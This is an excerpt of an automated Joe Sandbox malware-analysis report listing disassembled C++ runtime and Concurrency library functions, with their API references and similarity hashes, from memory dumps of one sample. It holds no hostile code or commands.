                                                    Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                      • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                      • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                    • String ID:
                                                    • API String ID: 4284812201-0
                                                    • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                    • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                    • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                    • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                    Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                      • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                      • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                    • GetLastError.KERNEL32 ref: 00413541
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                      • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                    • String ID:
                                                    • API String ID: 1674182817-0
                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                    • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                    • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                    Function 02503773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0250378C
                                                      • Part of subcall function 02502B16: ___crtGetTimeFormatEx.LIBCMT ref: 02502B2C
                                                      • Part of subcall function 02502B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02502B4B
                                                    • GetLastError.KERNEL32 ref: 025037A8
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025037BE
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025037CC
                                                      • Part of subcall function 025028EC: SetThreadPriority.KERNEL32(?,?), ref: 025028F8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                    • String ID:
                                                    • API String ID: 1674182817-0
                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                    • Instruction ID: fb76c09d004dba6f175d226a769e9471a667ffb0cc4a69bce33fcdb6aa01ab0f
                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                    • Instruction Fuzzy Hash: 14F0AEB154031639E720B7759C49FBB369CAF41751F500866B905E60C1EA94D40445BD
                                                    Function 024FD486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02501342
                                                      • Part of subcall function 02500BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02500BD6
                                                      • Part of subcall function 02500BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02500BF7
                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02501355
                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02501361
                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0250136A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                    • String ID:
                                                    • API String ID: 4284812201-0
                                                    • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                    • Instruction ID: 76ceceaa544bd4081e53b214760b4e1c0f38c56683852b074f13e6808516419a
                                                    • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                    • Instruction Fuzzy Hash: 39F02431200B06A7CF047AB48C91ABD35977FC1324B08812A9512AF3C0DF709D019AAD
                                                    Function 0250D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0250D088
                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0250D0AC
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0250D0BF
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0250D0CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                    • String ID:
                                                    • API String ID: 3657713681-0
                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                    • Instruction ID: 82892a7dc33eed3ffefba7b1cda33367a7c07f24db01a394ee8bfb9454b23ed6
                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                    • Instruction Fuzzy Hash: E4F05931901205A3C324FB94DCE1C7EB77AFFD0B24360892AD809131C1EB71A90ACA59
                                                    Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                    • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                    • String ID:
                                                    • API String ID: 3803302727-0
                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                    • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                    • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                    Function 024F5A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Cnd_initX.LIBCPMT ref: 024F5A83
                                                    • __Cnd_signal.LIBCPMT ref: 024F5A8F
                                                    • std::_Cnd_initX.LIBCPMT ref: 024F5AA4
                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 024F5AAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                    • String ID:
                                                    • API String ID: 2059591211-0
                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                    • Instruction ID: 03bc2109bb6f2486f1d333f6f2ecdcf961e6e10b201aec037da344cb116a20d3
                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                    • Instruction Fuzzy Hash: 7FF0A731400701DFEB617772D81571A73A2AF80319F54451FD259969E0CFB6E8154E55
                                                    Function 02502858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0250286F
                                                    • GetLastError.KERNEL32(?,?,?,?,02508830,?,?,?,?,00000000,?,00000000), ref: 0250287E
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502894
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025028A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                    • String ID:
                                                    • API String ID: 3803302727-0
                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                    • Instruction ID: 428628efea23fb2ef85f27f996974fb00bdc406e468c66212a42f2102f4c27e7
                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                    • Instruction Fuzzy Hash: 6EF0303550020ABBDF10EFA4CD89EAF3BB87F00751F600655B915E60E0DB75D6049B68
                                                    Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                    • String ID:
                                                    • API String ID: 200240550-0
                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                    • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                    • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                    Function 0250257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___crtCreateEventExW.LIBCPMT ref: 02502593
                                                    • GetLastError.KERNEL32(?,?,?,?,?,02500DA0), ref: 025025A1
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025025B7
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025025C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                    • String ID:
                                                    • API String ID: 200240550-0
                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                    • Instruction ID: a49786fb2f2a7ce8c55804ab1e52b65d889caa64495110652bf3ff6324777038
                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                    • Instruction Fuzzy Hash: 47E0D86164021639E710B7758C5AF7F369C6B00B41F440855BD14E50D1FA94D50049BC
                                                    Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                    • GetLastError.KERNEL32 ref: 00423991
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                    • String ID:
                                                    • API String ID: 3735082963-0
                                                    • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                    • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                    • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                    • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                    Function 02509530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02502959: TlsAlloc.KERNEL32(?,02500DA0), ref: 0250295F
                                                    • TlsAlloc.KERNEL32(?,02500DA0), ref: 02513BE6
                                                    • GetLastError.KERNEL32 ref: 02513BF8
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02513C0E
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02513C1C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                    • String ID:
                                                    • API String ID: 3735082963-0
                                                    • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                    • Instruction ID: 216d50fcf77f74f867e33de1cc1dd4055c0e74c52c3bc24f24fb4ff5bc9dfefb
                                                    • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                    • Instruction Fuzzy Hash: BCE09274500216BBE310BB79DCA9A7A7A687B00755B100EA6E526E20E0FA34D14A8E6D
                                                    Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                    • String ID:
                                                    • API String ID: 3016159387-0
                                                    • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                    • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                    • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                    • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                    Function 02502794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02500DA0), ref: 0250279E
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02500DA0), ref: 025027AD
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025027C3
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025027D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                    • String ID:
                                                    • API String ID: 3016159387-0
                                                    • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                    • Instruction ID: 955a95791d351813a019d831e8f609a9c9137ac948394d796939f6d89ab2c94b
                                                    • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                    • Instruction Fuzzy Hash: 98E04F7460010AA7DB10FBB5DD8DAAF77BC7B40B05F600565A901E2190EB68E6088B6D
                                                    Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                    • GetLastError.KERNEL32 ref: 0041269D
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                    • String ID:
                                                    • API String ID: 4286982218-0
                                                    • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                    • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                    • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                    • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                    Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                    • String ID:
                                                    • API String ID: 1964976909-0
                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                    • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                    • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                    Function 025028EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPriority.KERNEL32(?,?), ref: 025028F8
                                                    • GetLastError.KERNEL32 ref: 02502904
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0250291A
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02502928
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                    • String ID:
                                                    • API String ID: 4286982218-0
                                                    • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                    • Instruction ID: 711643237fb8173fb79e3123b095a20cf519036165f3e66e927c2149989b1b92
                                                    • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                    • Instruction Fuzzy Hash: 9EE04F3450010A6BDB14BF65CD89ABA3A6C7B00645F500925B915D20A0EB35D1048A9C
                                                    Function 025029B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • TlsSetValue.KERNEL32(?,00000000,02507BD8,00000000,?,?,02500DA0,?,?,?,00000000,?,00000000), ref: 025029BE
                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 025029CA
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025029E0
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025029EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                    • String ID:
                                                    • API String ID: 1964976909-0
                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                    • Instruction ID: bf8e36fa806aaaf99f9b6a8e92ebe47ad9633829d6a71baae8d4434ae8d438a0
                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                    • Instruction Fuzzy Hash: 83E04F3450010A6ADB10BF64CC8CBBA3A687F00745F500925A919E10A0EB35D1549AAC
                                                    Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                    • GetLastError.KERNEL32 ref: 00412705
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                    • String ID:
                                                    • API String ID: 3103352999-0
                                                    • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                    • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                    • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                    • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                    Function 02502959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • TlsAlloc.KERNEL32(?,02500DA0), ref: 0250295F
                                                    • GetLastError.KERNEL32 ref: 0250296C
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502982
